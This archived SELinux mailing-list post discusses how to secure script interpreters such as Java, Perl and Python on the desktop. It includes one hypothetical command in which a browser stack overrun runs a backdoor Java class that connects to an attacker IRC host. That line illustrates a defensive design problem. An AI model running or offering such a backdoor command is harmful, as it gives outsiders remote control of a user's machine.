SELinux and the Desktop
Steve Coleman
23e9t5t02 at sneakemail.com
Thu Oct 14 17:56:57 UTC 2004
Colin Walters walters-at-redhat.com |fedora| wrote:
>The major threat here is environment variables, right?
>
That one is a minor issue in my book, but certainly worth trying to
enforce in some way.
>I wonder what all
>would break if we by changed e.g. bash and python to by default clean
>the environment before executing the script if it was executed from a
>domain transition
>
Could be a lot. If you sanitize classpath or PERL5LIB a lot could break,
but it you don't you might not be running what you think you are, which
leads back to what I was inquiring about.
So just to clarify, whats the difference between a user running a script
file that does exec "java ./MyClass.class" and a stack overrun causing a
browser with a smashed stack to save a MyBackdoor.class to the local
file system and execing "java ./MyBackdoor.class -irc
blackhathosting.org" ?
In both cases its the same user, and in both cases its the same java VM
binary. The java binary is likely the only process that knows enought to
enforce anything here based on when, what, and where things are run by
the user. The browser may try to limit what permissions are passed to
the exec call but with a smashed stack overrun can you trust it to? Not
me, at least not yet. This looks to me like the java VM needs to be
hacked with the SELinux API in order to have any confidence in it, but
in some ways that duplicates the java security managers role in life.
Perhaps we just need a specialized Java security manager, perhaps much
more. Dunno. But its a common issue with desktop actions and shells, as
well as Perl, Python, Ruby, just pick your poison...
I guess what I was looking for was a phylosophy for how to handle this
nebulous issue. The more likely answer is each has its own issues and
must be dealt with seperatly in its own special way and must be changed
to deal with SE. I am hoping for a better option as there is much in SE
I don't know yet and I do want to understand it in great detail some way
down the road.
Thanks.
More information about the selinux
mailing list